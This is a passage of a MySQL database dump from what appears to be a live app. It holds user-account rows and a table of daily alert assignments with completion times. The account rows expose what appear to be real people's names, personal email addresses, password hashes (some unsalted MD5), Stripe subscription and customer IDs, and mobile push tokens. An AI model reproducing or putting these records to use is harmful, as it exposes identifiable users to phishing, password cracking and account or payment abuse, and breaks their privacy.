(298, NULL, 'Kelechi', 'kelechisamuel58@gmail.com', 'f0a4c3e386fe2ed8bd1c9d508eb48838', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-14 21:38:44', 'kelechisamuel587666de', 'Samuel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 18:38:44', NULL, 1, 0, NULL, '31955a78a638ca15beafdc2dc3e5c937aa32912127aaea78c65d5fa1d8652704', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(299, NULL, 'Mukesh Kumar', 'mukeshkumar.tunikala@gmail.com', 'd99313bc636c9c284ffd5377c890b2fc', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-15 00:38:03', 'mukeshkumar.tunikala3f3085', 'Tunikala', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 21:38:03', NULL, 1, 0, NULL, NULL, '44210ac9ad0e93ce9d137f8bb9c805d1cb37ecc51805d45461bd8e1b86b41400', NULL, NULL, 'ExponentPushToken[FZiAVXCMeoLIhxoBrUUWxM]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(300, NULL, 'Bx1', 'dfultdfult179@gmail.com', '$2a$10$6OclyDczYXK.bED6KpWuZOYiI.sh9NhRc79W1qgb20ODzFCBF1zUS', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-15 02:27:22', 'd3f4ult ', 'Bx1 ', 0, '8ab98b49fe44d6b42b2abc7b7f0449d46b2454e4c06c74d6ee5fa36956eee02b', NULL, NULL, 0, NULL, NULL, '2026-03-14 23:27:22', NULL, 1, 0, NULL, '448f7d40f59b460014360547397b495fbf69d68e11a87fc29097aa2532a2c626', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(301, NULL, 'adel', 'haraga0901@gmail.com', 'f5830a5e3c768a2f1ed5602cff98ecf2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-15 10:46:34', 'haraga0901f3add5', 'adel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 07:46:34', NULL, 1, 0, NULL, NULL, 'b94ddadcd227b35ba9e3c850ca782a5c2d88bcb58e924773f4559d39a290f3b3', NULL, NULL, 'ExponentPushToken[GwrgUiD1VCHMFND-1D7BFT]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(302, NULL, 'Carlos', 'carlo.opoku12@icloud.com', '$2a$10$AFEKwMAZK2B40ItVAT5DIu7EJ4TfoUku/2LYf27a9PdvW44DOM2k.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-15 13:47:31', 'Carlos ', 'Boateng', 0, 'ac360df14a06f0e843c8a6d1b29b3d02db220c693c3ce847c7975764421e0a84', NULL, NULL, 0, NULL, NULL, '2026-03-15 10:47:31', NULL, 1, 0, NULL, 'c3f50b81673920fd5dcc15def85ed2470dfbf5db34254fc389eff71625dd7fea', NULL, NULL, NULL, 'ExponentPushToken[nokajIEDdf3sgiLz2iCd-v]', NULL, 0, NULL, 'ios', 0, 1, 0),
(303, NULL, 'Arun kumar', 'akarunkumar348@gmail.com', 'deb19d2f2985953b3d4b88661bea3c87', 'pro', NULL, 'monthly', 'active', 'sub_1TBIKoL5VKtXn66bia6phBfg', 'cus_U9bXRfvhWJEkKU', 0, NULL, NULL, NULL, NULL, 1, '2026-03-15 20:12:43', 'akarunkumar3489c1d69', 'G', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 17:12:43', NULL, 1, 0, NULL, 'de4a4e9a7128d5c3bc73a002b45a9e4cf8752857dc99114e26f021b8efc38499', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(304, NULL, 'Carlos', 'villarca@outlook.com', '$2a$10$3cMwns.4MpkgI4qSOWzniewTqLteIDPlGfUJZeRAWSywvcJWHpEQ2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-15 20:28:04', 'villarc', 'Villar', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 17:28:04', NULL, 1, 0, NULL, '05fa4e0aaa0ae57c495f6ec8f857dbb6895783767aecc4f2d46ab486786e1c29', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(305, NULL, 'Karthik', 'karthikandatom@gmail.com', '$2a$10$bJcluuRxIN5NnjYaP/Yf/egycfdatK6ECJwBvDoFDA4m1IIM0wpgi', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-15 20:51:16', 'At0m', 'K', 0, 'e7b2a22d09cf4f8d6f4e7d0ae97699e2fff4656d47b0a5a5752b53fa8680de4d', NULL, NULL, 0, NULL, NULL, '2026-03-15 17:51:16', NULL, 1, 0, NULL, '65560ec6179667c89a0f7f3571950f5c7224f41ba8bda4f4189ed7b361e8bb28', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'ios', 0, 1, 0),
(306, NULL, 'Adi', 'adibhaibt000@gmail.com', 'f5621a33b2bc96b2033747f6990b10d3', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-15 21:10:21', 'adibhaibt000623a7c', 'Bhai', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 18:10:21', NULL, 1, 0, NULL, NULL, '264f8aa419fa61db44c5884935c8c5078d7e0b1401eba14f6caaaafff3f3227d', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(307, NULL, 'Shanyo', 'shantaciak@gmail.com', '$2a$10$/WY.gVH3dLvCDS.WZJfLj./yxdA6NKeHTtjEOtiMo6T5IL8lGauaW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-15 21:38:43', 'staciak ', 'Taciak', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-15 18:38:43', NULL, 1, 0, NULL, '34829590083f7a645d5cd942f9e43731747503e72967efbf7b0c0ff3f764fa4d', NULL, NULL, NULL, 'ExponentPushToken[EBC_h_EluP9eUirsWGLzB8]', NULL, 0, NULL, 'ios', 0, 1, 0),
(308, NULL, 'Film', 'khussein112@gmail.com', 'cf95c27f74a086b8e8a22c6fa87b11e1', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-16 04:42:39', 'khussein112c10ef0', 'andRun', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-16 01:42:39', NULL, 1, 0, NULL, '4aae8c008d39ead7363b0884e63dcea706bc4ee24720eacc4df0578fd751750a', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `user_alert_assignments`
--

CREATE TABLE `user_alert_assignments` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `assigned_date` date NOT NULL,
  `completed` tinyint(1) DEFAULT 0,
  `is_replay` tinyint(1) DEFAULT 0,
  `xp_earned` int(11) DEFAULT 0,
  `completed_at` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_alert_assignments`
--

INSERT INTO `user_alert_assignments` (`id`, `user_id`, `alert_id`, `assigned_date`, `completed`, `is_replay`, `xp_earned`, `completed_at`) VALUES
(1, 34, 383, '2026-01-11', 0, 0, 0, NULL),
(2, 34, 398, '2026-01-11', 0, 0, 0, NULL),
(3, 34, 359, '2026-01-11', 0, 0, 0, NULL),
(4, 34, 375, '2026-01-11', 0, 0, 0, NULL),
(5, 34, 302, '2026-01-11', 0, 0, 0, NULL),
(6, 34, 599, '2026-01-11', 0, 0, 0, NULL),
(7, 34, 355, '2026-01-11', 0, 0, 0, NULL),
(8, 34, 345, '2026-01-11', 1, 0, 0, '2026-01-14 02:30:41'),
(9, 34, 596, '2026-01-11', 0, 0, 0, NULL),
(10, 34, 573, '2026-01-11', 0, 0, 0, NULL),
(11, 34, 640, '2026-01-11', 0, 0, 0, NULL),
(12, 34, 675, '2026-01-11', 1, 0, 0, '2026-02-13 04:56:20'),
(13, 34, 739, '2026-01-11', 0, 0, 0, NULL),
(14, 34, 673, '2026-01-11', 0, 0, 0, NULL),
(15, 34, 732, '2026-01-11', 1, 0, 0, '2026-01-14 02:29:02'),
(16, 34, 738, '2026-01-11', 0, 0, 0, NULL),
(17, 34, 669, '2026-01-11', 0, 0, 0, NULL),
(18, 34, 677, '2026-01-11', 0, 0, 0, NULL),
(19, 34, 758, '2026-01-11', 0, 0, 0, NULL),
(20, 34, 766, '2026-01-12', 1, 0, 0, '2026-01-23 06:27:53'),
(21, 34, 762, '2026-01-12', 1, 0, 0, '2026-02-13 04:56:20'),
(22, 34, 753, '2026-01-12', 1, 0, 0, '2026-02-13 04:56:20'),
(23, 34, 756, '2026-01-12', 0, 0, 0, NULL),
(24, 34, 745, '2026-01-12', 1, 0, 0, '2026-02-11 05:45:24'),
(25, 34, 655, '2026-01-12', 0, 0, 0, NULL),
(26, 34, 228, '2026-01-12', 0, 0, 0, NULL),
(27, 34, 230, '2026-01-12', 0, 0, 0, NULL),
(33, 34, 718, '2026-01-12', 0, 0, 0, NULL),
(34, 34, 602, '2026-01-12', 0, 0, 0, NULL),
(36, 74, 626, '2026-01-12', 0, 0, 0, NULL),
(37, 74, 636, '2026-01-12', 0, 0, 0, NULL),
(38, 74, 283, '2026-01-12', 0, 0, 0, NULL),
(39, 74, 762, '2026-01-12', 0, 0, 0, NULL),
(40, 74, 633, '2026-01-12', 0, 0, 0, NULL),
(41, 74, 635, '2026-01-12', 0, 0, 0, NULL),
(42, 74, 234, '2026-01-12', 0, 0, 0, NULL),
(43, 74, 282, '2026-01-12', 0, 0, 0, NULL),
(44, 74, 251, '2026-01-12', 0, 0, 0, NULL),
(45, 74, 231, '2026-01-12', 0, 0, 0, NULL),
(46, 76, 689, '2026-01-13', 0, 0, 0, NULL),
(47, 76, 690, '2026-01-13', 0, 0, 0, NULL),
(48, 76, 245, '2026-01-13', 0, 0, 0, NULL),
(49, 76, 707, '2026-01-13', 0, 0, 0, NULL),
(50, 76, 236, '2026-01-13', 0, 0, 0, NULL),
(51, 76, 709, '2026-01-13', 0, 0, 0, NULL),
(52, 76, 602, '2026-01-13', 0, 0, 0, NULL),
(53, 76, 225, '2026-01-13', 0, 0, 0, NULL),
(54, 76, 629, '2026-01-13', 0, 0, 0, NULL),
(55, 76, 284, '2026-01-13', 0, 0, 0, NULL),
(56, 34, 756, '2026-01-13', 0, 0, 0, NULL),
(57, 34, 762, '2026-01-13', 1, 0, 0, '2026-02-13 04:56:20'),
(58, 34, 766, '2026-01-13', 1, 0, 0, '2026-01-23 06:27:53'),
(59, 34, 745, '2026-01-13', 1, 0, 0, '2026-02-11 05:45:24'),
(60, 34, 753, '2026-01-13', 1, 0, 0, '2026-02-13 04:56:20'),
(61, 34, 694, '2026-01-13', 0, 0, 0, NULL),
(62, 34, 668, '2026-01-13', 0, 0, 0, NULL),
(63, 34, 230, '2026-01-13', 0, 0, 0, NULL),
(69, 34, 252, '2026-01-13', 1, 0, 0, '2026-02-13 04:56:20'),
(70, 34, 735, '2026-01-13', 0, 0, 0, NULL),
(72, 34, 766, '2026-01-14', 1, 0, 0, '2026-01-23 06:27:53'),
(73, 34, 745, '2026-01-14', 1, 0, 0, '2026-02-11 05:45:24'),
(74, 34, 753, '2026-01-14', 1, 0, 0, '2026-02-13 04:56:20'),
(75, 34, 762, '2026-01-14', 1, 0, 0, '2026-02-13 04:56:20'),
(76, 34, 219, '2026-01-14', 0, 0, 0, NULL),
(77, 34, 676, '2026-01-14', 0, 0, 0, NULL),
(78, 34, 230, '2026-01-14', 0, 0, 0, NULL),
(79, 78, 220, '2026-01-14', 1, 0, 0, '2026-01-16 04:29:01'),
(80, 78, 628, '2026-01-14', 1, 0, 0, '2026-01-16 04:31:24'),
(81, 78, 624, '2026-01-14', 0, 0, 0, NULL),
(82, 78, 259, '2026-01-14', 0, 0, 0, NULL),
(83, 78, 623, '2026-01-14', 1, 0, 0, '2026-01-14 17:39:31'),
(84, 78, 710, '2026-01-14', 1, 0, 0, '2026-02-13 21:56:41'),
(85, 78, 622, '2026-01-14', 1, 0, 0, '2026-01-16 04:29:28'),
(86, 78, 248, '2026-01-14', 0, 0, 0, NULL),
(87, 78, 688, '2026-01-14', 1, 0, 0, '2026-01-16 04:32:09'),
(88, 78, 229, '2026-01-14', 0, 0, 0, NULL),
(89, 74, 646, '2026-01-14', 0, 0, 0, NULL),
(90, 74, 761, '2026-01-14', 0, 0, 0, NULL),
(91, 74, 693, '2026-01-14', 0, 0, 0, NULL),
(92, 74, 642, '2026-01-14', 0, 0, 0, NULL),
(93, 74, 251, '2026-01-14', 0, 0, 0, NULL),
(94, 74, 225, '2026-01-14', 0, 0, 0, NULL),
(95, 74, 624, '2026-01-14', 0, 0, 0, NULL),
(96, 74, 757, '2026-01-14', 0, 0, 0, NULL),
(97, 74, 601, '2026-01-14', 0, 0, 0, NULL),
(98, 74, 623, '2026-01-14', 0, 0, 0, NULL),
(99, 77, 246, '2026-01-14', 1, 0, 0, '2026-01-15 09:37:53'),
(100, 77, 708, '2026-01-14', 1, 0, 0, '2026-01-14 15:18:53'),
(101, 77, 303, '2026-01-14', 1, 0, 0, '2026-01-14 15:20:02'),
(102, 77, 762, '2026-01-14', 0, 0, 0, NULL),
(103, 77, 627, '2026-01-14', 1, 0, 0, '2026-01-14 15:22:07'),
(104, 77, 314, '2026-01-14', 0, 0, 0, NULL),
(105, 77, 231, '2026-01-14', 1, 0, 0, '2026-01-15 09:34:10'),
(106, 77, 245, '2026-01-14', 1, 0, 0, '2026-01-15 09:36:29'),
(107, 77, 727, '2026-01-14', 0, 0, 0, NULL),
(108, 77, 228, '2026-01-14', 1, 0, 0, '2026-01-15 09:37:29'),
(109, 79, 604, '2026-01-15', 1, 0, 0, '2026-01-17 16:05:04'),
(110, 79, 633, '2026-01-15', 1, 0, 0, '2026-01-18 16:28:14'),
(111, 79, 690, '2026-01-15', 1, 0, 0, '2026-01-17 16:05:37'),
(112, 79, 317, '2026-01-15', 1, 0, 0, '2026-01-16 07:12:23'),
(113, 79, 225, '2026-01-15', 1, 0, 0, '2026-01-16 07:03:24'),
(114, 79, 251, '2026-01-15', 1, 0, 0, '2026-01-16 02:10:07'),
(115, 79, 689, '2026-01-15', 1, 0, 0, '2026-01-17 05:26:39'),
(116, 79, 237, '2026-01-15', 1, 0, 0, '2026-01-16 07:07:30'),
(117, 79, 284, '2026-01-15', 1, 0, 0, '2026-01-16 02:09:04'),
(118, 79, 273, '2026-01-15', 1, 0, 0, '2026-01-16 07:08:06'),
(119, 79, 730, '2026-01-16', 1, 0, 0, '2026-01-16 15:51:51'),
(120, 79, 317, '2026-01-16', 1, 0, 0, '2026-01-16 07:12:23'),
(121, 79, 602, '2026-01-16', 1, 0, 0, '2026-01-16 07:03:47'),
(122, 79, 314, '2026-01-16', 1, 0, 0, '2026-01-16 15:49:09'),
(123, 79, 223, '2026-01-16', 1, 0, 0, '2026-01-16 07:08:44'),
(124, 79, 634, '2026-01-16', 1, 0, 0, '2026-01-16 07:02:39'),
(125, 79, 248, '2026-01-16', 1, 0, 0, '2026-01-19 08:05:05'),
(126, 79, 631, '2026-01-16', 1, 0, 0, '2026-01-16 15:52:05'),
(127, 79, 603, '2026-01-16', 1, 0, 0, '2026-01-16 07:11:09'),
(128, 79, 235, '2026-01-16', 1, 0, 0, '2026-01-18 16:32:08'),
(129, 1, 729, '2026-01-16', 0, 0, 0, NULL),
(130, 1, 758, '2026-01-16', 0, 0, 0, NULL),
(131, 1, 229, '2026-01-16', 0, 0, 0, NULL),
(132, 1, 839, '2026-01-16', 0, 0, 0, NULL),
(133, 1, 687, '2026-01-16', 0, 0, 0, NULL),
(134, 1, 728, '2026-01-16', 0, 0, 0, NULL),
(135, 1, 234, '2026-01-16', 0, 0, 0, NULL),
(136, 1, 629, '2026-01-16', 0, 0, 0, NULL),
(137, 1, 844, '2026-01-16', 0, 0, 0, NULL),
(138, 1, 625, '2026-01-16', 0, 0, 0, NULL),
(139, 85, 727, '2026-01-16', 0, 0, 0, NULL),
(140, 85, 958, '2026-01-16', 0, 0, 0, NULL),
(141, 85, 222, '2026-01-16', 0, 0, 0, NULL),
(142, 85, 227, '2026-01-16', 0, 0, 0, NULL),
(143, 85, 952, '2026-01-16', 1, 0, 0, '2026-01-16 16:36:21'),
(144, 85, 302, '2026-01-16', 0, 0, 0, NULL),
(145, 85, 234, '2026-01-16', 0, 0, 0, NULL),
(146, 85, 689, '2026-01-16', 0, 0, 0, NULL),
(147, 85, 759, '2026-01-16', 0, 0, 0, NULL),
(148, 85, 729, '2026-01-16', 0, 0, 0, NULL),
(149, 86, 759, '2026-01-16', 0, 0, 0, NULL),
(150, 86, 762, '2026-01-16', 0, 0, 0, NULL),
(151, 86, 951, '2026-01-16', 0, 0, 0, NULL),
(152, 86, 227, '2026-01-16', 0, 0, 0, NULL),
(153, 86, 218, '2026-01-16', 0, 0, 0, NULL),
(154, 86, 283, '2026-01-16', 0, 0, 0, NULL),
(155, 86, 958, '2026-01-16', 0, 0, 0, NULL),
(156, 86, 254, '2026-01-16', 1, 0, 0, '2026-01-16 21:39:14'),
(157, 86, 710, '2026-01-16', 0, 0, 0, NULL),
(158, 86, 216, '2026-01-16', 0, 0, 0, NULL),
(159, 54, 951, '2026-01-17', 0, 0, 0, NULL),
(160, 54, 957, '2026-01-17', 0, 0, 0, NULL),
(161, 54, 687, '2026-01-17', 0, 0, 0, NULL),
(162, 54, 230, '2026-01-17', 0, 0, 0, NULL),
(163, 54, 958, '2026-01-17', 0, 0, 0, NULL),
(164, 54, 953, '2026-01-17', 0, 0, 0, NULL),
(165, 54, 218, '2026-01-17', 0, 0, 0, NULL),
(166, 54, 690, '2026-01-17', 0, 0, 0, NULL),
(167, 54, 959, '2026-01-17', 0, 0, 0, NULL),
(168, 54, 248, '2026-01-17', 0, 0, 0, NULL),
(169, 74, 950, '2026-01-17', 1, 0, 0, '2026-01-17 11:45:12'),
(170, 74, 945, '2026-01-17', 0, 0, 0, NULL),
(171, 74, 852, '2026-01-17', 0, 0, 0, NULL),
(172, 74, 940, '2026-01-17', 0, 0, 0, NULL),
(173, 74, 946, '2026-01-17', 0, 0, 0, NULL),
(174, 74, 955, '2026-01-17', 0, 0, 0, NULL),
(175, 74, 947, '2026-01-17', 0, 0, 0, NULL),
(176, 74, 621, '2026-01-17', 0, 0, 0, NULL),
(177, 74, 953, '2026-01-17', 0, 0, 0, NULL),
(178, 74, 711, '2026-01-17', 0, 0, 0, NULL),
(179, 1, 698, '2026-01-17', 0, 0, 0, NULL),
(180, 1, 637, '2026-01-17', 0, 0, 0, NULL),
(181, 1, 837, '2026-01-17', 1, 0, 0, '2026-01-21 06:12:48'),
(182, 1, 767, '2026-01-17', 0, 0, 0, NULL),
(183, 1, 663, '2026-01-17', 0, 0, 0, NULL),
(184, 1, 609, '2026-01-17', 0, 0, 0, NULL),
(185, 1, 649, '2026-01-17', 0, 0, 0, NULL),
(186, 1, 666, '2026-01-17', 0, 0, 0, NULL),
(187, 1, 660, '2026-01-17', 0, 0, 0, NULL),
(188, 1, 763, '2026-01-17', 0, 0, 0, NULL),
(189, 34, 852, '2026-01-18', 1, 0, 0, '2026-01-22 15:42:34'),
(190, 34, 945, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(191, 34, 959, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(192, 34, 766, '2026-01-18', 1, 0, 0, '2026-01-23 06:27:53'),
(193, 34, 944, '2026-01-18', 1, 0, 0, '2026-01-22 06:15:09'),
(194, 34, 955, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(195, 34, 762, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(196, 34, 1027, '2026-01-18', 0, 0, 0, NULL),
(197, 34, 652, '2026-01-18', 0, 0, 0, NULL),
(198, 34, 946, '2026-01-18', 1, 0, 0, '2026-02-13 04:56:20'),
(199, 52, 625, '2026-01-19', 0, 0, 0, NULL),
(200, 52, 239, '2026-01-19', 0, 0, 0, NULL),
(201, 52, 710, '2026-01-19', 0, 0, 0, NULL),
(202, 52, 632, '2026-01-19', 0, 0, 0, NULL),
(203, 52, 222, '2026-01-19', 0, 0, 0, NULL),
(204, 52, 707, '2026-01-19', 1, 0, 0, '2026-01-19 11:52:46'),
(205, 52, 234, '2026-01-19', 0, 0, 0, NULL),
(206, 52, 955, '2026-01-19', 0, 0, 0, NULL),
(207, 52, 218, '2026-01-19', 0, 0, 0, NULL),
(208, 52, 629, '2026-01-19', 0, 0, 0, NULL),
(209, 54, 948, '2026-01-19', 0, 0, 0, NULL),
(210, 54, 218, '2026-01-19', 0, 0, 0, NULL),
(211, 54, 953, '2026-01-19', 0, 0, 0, NULL),
(212, 54, 762, '2026-01-19', 0, 0, 0, NULL),
(213, 54, 226, '2026-01-19', 0, 0, 0, NULL),
(214, 54, 224, '2026-01-19', 0, 0, 0, NULL),
(215, 54, 951, '2026-01-19', 0, 0, 0, NULL),
(216, 54, 761, '2026-01-19', 0, 0, 0, NULL),
(217, 54, 227, '2026-01-19', 0, 0, 0, NULL),
(218, 54, 222, '2026-01-19', 0, 0, 0, NULL),
(219, 91, 951, '2026-01-20', 0, 0, 0, NULL),
(220, 91, 227, '2026-01-20', 0, 0, 0, NULL),
(221, 91, 959, '2026-01-20', 0, 0, 0, NULL),
(222, 91, 226, '2026-01-20', 0, 0, 0, NULL),
(223, 91, 948, '2026-01-20', 0, 0, 0, NULL),
(224, 91, 957, '2026-01-20', 0, 0, 0, NULL),
(225, 91, 760, '2026-01-20', 0, 0, 0, NULL),
(226, 91, 687, '2026-01-20', 0, 0, 0, NULL),
(227, 91, 956, '2026-01-20', 0, 0, 0, NULL),
(228, 91, 630, '2026-01-20', 0, 0, 0, NULL),
(229, 93, 229, '2026-01-20', 0, 0, 0, NULL),
(230, 93, 629, '2026-01-20', 0, 0, 0, NULL),
(231, 93, 227, '2026-01-20', 0, 0, 0, NULL),
(232, 93, 253, '2026-01-20', 0, 0, 0, NULL),
(233, 93, 624, '2026-01-20', 0, 0, 0, NULL),
(234, 93, 283, '2026-01-20', 1, 0, 0, '2026-01-21 00:08:02'),
(235, 93, 728, '2026-01-20', 1, 0, 0, '2026-01-21 00:01:30'),
(236, 93, 948, '2026-01-20', 1, 0, 0, '2026-01-21 00:13:10'),
(237, 93, 632, '2026-01-20', 0, 0, 0, NULL),
(238, 93, 238, '2026-01-20', 0, 0, 0, NULL),
(239, 94, 953, '2026-01-21', 0, 0, 0, NULL),
(240, 94, 302, '2026-01-21', 0, 0, 0, NULL),
(241, 94, 954, '2026-01-21', 0, 0, 0, NULL),
(242, 94, 710, '2026-01-21', 0, 0, 0, NULL),
(243, 94, 222, '2026-01-21', 0, 0, 0, NULL),
(244, 94, 218, '2026-01-21', 0, 0, 0, NULL),
(245, 94, 226, '2026-01-21', 0, 0, 0, NULL),
(246, 94, 230, '2026-01-21', 0, 0, 0, NULL),
(247, 94, 253, '2026-01-21', 0, 0, 0, NULL),
(248, 94, 238, '2026-01-21', 0, 0, 0, NULL),
(249, 95, 259, '2026-01-21', 0, 0, 0, NULL),
(250, 95, 760, '2026-01-21', 0, 0, 0, NULL),
(251, 95, 955, '2026-01-21', 0, 0, 0, NULL),
(252, 95, 762, '2026-01-21', 0, 0, 0, NULL),
(253, 95, 238, '2026-01-21', 0, 0, 0, NULL),
(254, 95, 230, '2026-01-21', 0, 0, 0, NULL),
(255, 95, 625, '2026-01-21', 1, 0, 0, '2026-01-21 21:44:05'),
(256, 95, 227, '2026-01-21', 1, 0, 0, '2026-01-21 21:51:26'),
(257, 95, 761, '2026-01-21', 1, 0, 0, '2026-01-21 21:41:12'),
(258, 95, 729, '2026-01-21', 0, 0, 0, NULL),
(259, 34, 955, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(260, 34, 959, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(261, 34, 946, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(262, 34, 945, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(263, 34, 766, '2026-01-21', 1, 0, 0, '2026-01-23 06:27:53'),
(264, 34, 956, '2026-01-21', 0, 0, 0, NULL),
(265, 34, 753, '2026-01-21', 1, 0, 0, '2026-02-13 04:56:20'),
(266, 34, 713, '2026-01-21', 0, 0, 0, NULL),
(267, 34, 953, '2026-01-21', 0, 0, 0, NULL),
(268, 34, 944, '2026-01-21', 1, 0, 0, '2026-01-22 06:15:09'),
(269, 34, 940, '2026-01-22', 1, 0, 0, '2026-01-22 05:32:40'),
(270, 34, 944, '2026-01-22', 1, 0, 0, '2026-01-22 06:15:09'),
(271, 34, 1035, '2026-01-22', 0, 0, 0, NULL),
(272, 34, 852, '2026-01-22', 1, 0, 0, '2026-01-22 15:42:34'),
(273, 34, 753, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(274, 34, 840, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(275, 34, 1038, '2026-01-22', 1, 0, 0, '2026-01-22 05:21:44'),
(276, 34, 744, '2026-01-22', 1, 0, 0, '2026-01-22 05:58:26'),
(277, 34, 607, '2026-01-22', 1, 0, 0, '2026-01-22 06:12:00'),
(278, 34, 1037, '2026-01-22', 0, 0, 0, NULL),
(279, 96, 621, '2026-01-22', 1, 0, 0, '2026-01-22 07:16:29'),
(280, 96, 238, '2026-01-22', 0, 0, 0, NULL),
(281, 96, 959, '2026-01-22', 0, 0, 0, NULL),
(282, 96, 302, '2026-01-22', 0, 0, 0, NULL),
(283, 96, 709, '2026-01-22', 0, 0, 0, NULL),
(284, 96, 219, '2026-01-22', 0, 0, 0, NULL),
(285, 96, 226, '2026-01-22', 0, 0, 0, NULL),
(286, 96, 229, '2026-01-22', 0, 0, 0, NULL),
(287, 96, 729, '2026-01-22', 0, 0, 0, NULL),
(288, 96, 253, '2026-01-22', 0, 0, 0, NULL),
(290, 34, 946, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(291, 34, 745, '2026-01-22', 1, 0, 0, '2026-02-11 05:45:24'),
(292, 34, 945, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(294, 34, 956, '2026-01-22', 0, 0, 0, NULL),
(295, 34, 959, '2026-01-22', 1, 0, 0, '2026-02-13 04:56:20'),
(296, 34, 954, '2026-01-22', 0, 0, 0, NULL),
(297, 34, 755, '2026-01-22', 0, 0, 0, NULL),
(298, 34, 230, '2026-01-22', 0, 0, 0, NULL),
(299, 34, 959, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(300, 34, 955, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(301, 34, 766, '2026-01-23', 1, 0, 0, '2026-01-23 06:27:53'),
(302, 34, 947, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(303, 34, 753, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(304, 34, 946, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(305, 34, 945, '2026-01-23', 1, 0, 0, '2026-02-13 04:56:20'),
(306, 34, 665, '2026-01-23', 1, 0, 0, '2026-01-23 06:26:44'),
(307, 34, 845, '2026-01-23', 1, 0, 0, '2026-01-25 21:10:44'),
(308, 34, 956, '2026-01-23', 0, 0, 0, NULL),
(309, 79, 748, '2026-01-23', 1, 0, 0, '2026-01-24 15:33:54'),
(310, 79, 957, '2026-01-23', 0, 0, 0, NULL),
(311, 79, 936, '2026-01-23', 0, 0, 0, NULL),
(312, 79, 759, '2026-01-23', 1, 0, 0, '2026-01-23 07:16:24'),
(313, 79, 1031, '2026-01-23', 1, 0, 0, '2026-01-23 07:16:43'),
(314, 79, 219, '2026-01-23', 0, 0, 0, NULL),
(315, 79, 222, '2026-01-23', 1, 0, 0, '2026-01-24 15:35:43'),
(316, 79, 259, '2026-01-23', 1, 0, 0, '2026-01-24 15:37:24'),
(317, 79, 218, '2026-01-23', 1, 0, 0, '2026-01-24 15:37:47'),
(318, 79, 639, '2026-01-23', 1, 0, 0, '2026-02-02 15:11:45'),
(319, 56, 253, '2026-01-23', 0, 0, 0, NULL),
(320, 56, 252, '2026-01-23', 0, 0, 0, NULL),
(321, 56, 230, '2026-01-23', 0, 0, 0, NULL),
(322, 56, 951, '2026-01-23', 0, 0, 0, NULL),
(323, 56, 632, '2026-01-23', 0, 0, 0, NULL),
(324, 56, 956, '2026-01-23', 0, 0, 0, NULL),
(325, 56, 224, '2026-01-23', 0, 0, 0, NULL),
(326, 56, 710, '2026-01-23', 0, 0, 0, NULL),
(327, 56, 219, '2026-01-23', 0, 0, 0, NULL),
(328, 56, 624, '2026-01-23', 0, 0, 0, NULL),
(329, 42, 939, '2026-01-23', 0, 0, 0, NULL),
(330, 42, 954, '2026-01-23', 0, 0, 0, NULL),
(331, 42, 836, '2026-01-23', 0, 0, 0, NULL),
(332, 42, 753, '2026-01-23', 0, 0, 0, NULL),
(333, 42, 947, '2026-01-23', 0, 0, 0, NULL),
(334, 42, 736, '2026-01-23', 0, 0, 0, NULL),
(335, 42, 714, '2026-01-23', 0, 0, 0, NULL),
(336, 42, 702, '2026-01-23', 0, 0, 0, NULL),
(337, 42, 605, '2026-01-23', 0, 0, 0, NULL),
